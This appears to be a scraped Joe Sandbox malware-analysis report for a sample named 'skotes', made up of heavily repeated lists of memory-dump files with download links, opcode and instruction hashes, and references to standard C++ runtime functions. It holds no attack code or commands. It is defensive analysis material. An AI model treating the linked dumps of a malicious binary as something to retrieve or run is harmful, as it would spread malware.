                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1319684358-0
                                                                                                                                                                                                                                                  • Opcode ID: 5db5cee17d358c1970f458085ab3339d93ca828a5e5da90b27495502cb7a47a1
                                                                                                                                                                                                                                                  • Instruction ID: f2b077c748cd64494bcea2e7f0bf344c460d1b4843aa628db5d7eff808bce1a4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5db5cee17d358c1970f458085ab3339d93ca828a5e5da90b27495502cb7a47a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B33181B1E001168BCB15EFAAC8415AEB7F4EF49314B24446FE845E7351DB389E06CBA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID: vJ
                                                                                                                                                                                                                                                  • API String ID: 3213747228-190702178
                                                                                                                                                                                                                                                  • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                                  • Instruction ID: 56daa811097e1f2e94d492957541666e5f85402896b33f7f032b7f44b67f54e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFB1F2329042459FDB158F28C8C17AFBBE5EF66354F14816BD855EB341D6389D02CBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 004A1B57
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A1B66
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A1C2A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                                                                                  • String ID: pContext$switchState
                                                                                                                                                                                                                                                  • API String ID: 2656283622-2660820399
                                                                                                                                                                                                                                                  • Opcode ID: 7881c0f1a83b3b7020ac4d3c1c600b371ef347a76029f8c30706464115d8e53d
                                                                                                                                                                                                                                                  • Instruction ID: 2acaa293ec8e0d37d1df3aea82a751b7e0171e1c07b75fa4fda36384feef7c24
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7881c0f1a83b3b7020ac4d3c1c600b371ef347a76029f8c30706464115d8e53d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3931BB35A002149BCF04EF64C481EAE7375FF66324F20456BE911973A2EB78ED05CBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 004A4E6D
                                                                                                                                                                                                                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 004A4E86
                                                                                                                                                                                                                                                  • PMDtoOffset.LIBCMT ref: 004A4EAC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                  • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                  • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                  • Opcode ID: 6e118ffdf871b938fcc3a3cbf5e0c9a660beec4826bd283b500038fd90bfe21d
                                                                                                                                                                                                                                                  • Instruction ID: 1f7fa80c775aab9466728ee5590852faff62b5f7e9733411d976aa4077df04c9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e118ffdf871b938fcc3a3cbf5e0c9a660beec4826bd283b500038fd90bfe21d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA210772600204AFCF14DFA8D906EAF77A4FBE6724B10411FF90097680DBBDE90086A9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
